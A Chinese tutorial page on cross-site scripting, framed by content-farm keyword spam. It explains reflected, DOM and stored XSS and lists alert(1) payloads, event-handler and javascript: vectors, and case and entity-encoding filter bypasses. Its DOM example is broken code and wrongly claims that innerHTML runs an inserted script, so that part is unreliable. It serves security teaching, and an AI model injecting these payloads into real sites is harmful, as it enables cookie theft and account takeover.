当前位置: 首页 > news >正文

网站登录系统制作金山软件有哪些产品

网站登录系统制作,金山软件有哪些产品,wordpress圆圈特效,凡科可以做游戏网站吗目录 XSS的原理 反射型XSS DOM型XSS 存储型XSS 常见的XSS Payload XSS的原理 XSS全称跨站脚本(Cross Site Scripting),为避免与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS。这是一种将任意 Javascript 代码插入到其他Web用户页…

目录

XSS的原理

反射型XSS

DOM型XSS

存储型XSS

常见的XSS Payload


XSS的原理

XSS全称跨站脚本(Cross Site Scripting),为避免与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS。这是一种将任意 Javascript 代码插入到其他Web用户页面中执行以达到攻击目的的漏洞。攻击者利用浏览器的动态展示数据功能,在HTML页面里嵌入恶意代码。当用户浏览该页时,这些潜入在HTML中的恶意代码会被执行,用户浏览器被攻击者控制,从而达到攻击者的特殊目的,如 cookie窃取等。

XSS属于代码注入的一种,它允许攻击者将代码注入到网页,其他用户在浏览网页时就会受到影响。

XSS的产生原因就是没有对用户的输入做合法的过滤。

反射型XSS

在一个页面发现了一个功能,例如搜索,用户可以输入一些内容,这些内容会被插入到页面中,在过滤不严的情况下可能就会被页面解析。这些内容就包括恶意payload。因为没进数据库(输一次触发一次),所以是非持久型、短暂的且危害较小的一个漏洞。

反射型XSS的存在位置,可能在搜索、input表单,可能会存在过滤,可以通过编码等方式尝试绕过,JavaScript伪协议也可以触发XSS

DOM型XSS

因为 JS 可以控制页面中所有元素,所以在 JS 中可能会存在一些XSS的漏洞。这里和HTML的页面没关系了, JS 页面也可以触发payload。

<body><p id = "p">test</p>
</body>
<script>let p = document.getElementById('p');p.innerHTML = <script>alert(1)</script>  #这段代码会把p标签中的内容替换为<script>alert(1)</script>,就触发了
</script>

上面的触发过程和HTML没有关系,是被 JS 完整控制触发的,这种被称为DOM型XSS。

存储型XSS

提交的东西真的被存到数据库并且可以触发。是持久型的。通常发生在留言板等地方

常见的XSS Payload

(1)<script>标签直接注入
<script>alert(1)</script>
# 原理:直接插入<script>标签,内容会被浏览器解析为JS代码并执行。
(2)HTML事件处理器
<img src=1 onerror=alert(1)>  
<svg/onload=alert(1)>
# 原理:通过HTML标签的事件属性(如onerror、onload)触发JS代码。
(3)javascript:伪协议
<a href="javascript:alert(1)">aaaa</a>
# 原理:通过javascript:协议在用户点击链接时执行JS代码(需要用户交互)。
(4)自动聚焦(autofocus+onfocus)
<input onfocus=alert(1) autofocus>
# 原理:autofocus:使输入框自动获得焦点。onfocus:当元素聚焦时触发JS代码。(无需用户交互)
(5)大小写/标签变形
<ScRipT>alert(1)</sCriPt>
<IMG SRC=x ONERROR=alert(1)>
# 目的:绕过简单的关键字过滤(如正则匹配<script>)
(6)编码绕过
<img src=x onerror=&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;>
# 原理:使用HTML实体编码(如alert(1)———>&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;)
http://www.dtcms.com/a/505404.html

相关文章:

  • 大兴安岭网站建设兼职wordpress仿微博发文插件
  • python 做网站开发wordpress 更改目录权限
  • 宁波百度网站建设徐州网约车公司哪家好
  • 网站推广专员面试织梦企业模板去一品资源网
  • com网站建设品质最好的购物平台
  • 利用网站建设平台提供常州网站推广
  • 企业解决方案网站ui设计就业方向
  • 池州网站建设全包电脑网站
  • 建设银行网站网址是什么上海行业网站建设
  • 长沙手机网站建设哪些网页版微信网址
  • 南京营销网站建设大连门户网站建设
  • 公司网站别人做的怎么签合同大理网站建设滇icp备
  • 主机开通成功网站正在建设中网站开发证
  • 百度网站制作联系方式搜索排名竞价
  • 商城网站建设清单医疗设计网站
  • ASP4644S2B抗辐照性能的地面试验与在轨验证
  • 忻州做网站公司沃尔玛超市网上购物app下载
  • 超低价网站维护网站托管宝马itms做课网站
  • 高端 网站建设重庆做网站公司贴吧
  • 网站管理机制建设情况株洲网站建设和制作
  • 购物网站策划建设方案北京网页
  • 网站建设要什么证件自己做短视频网站
  • 深圳网站优化课程哪里学网站制作 番禺
  • 网站降权不收录如何知道网站流量
  • 福建省建设执业资格中心网站代理合同
  • 用自己的电脑做网站服务器如何开发手机版网站
  • 郑州专门做网站柳州网站建设11
  • 快速上手大模型:机器学习4(特征缩放、学习率选择)
  • 做网站费用 优帮云linux wordpress是什么意思
  • 网站建设推广兼职福建银瑞建设工程有限公司网站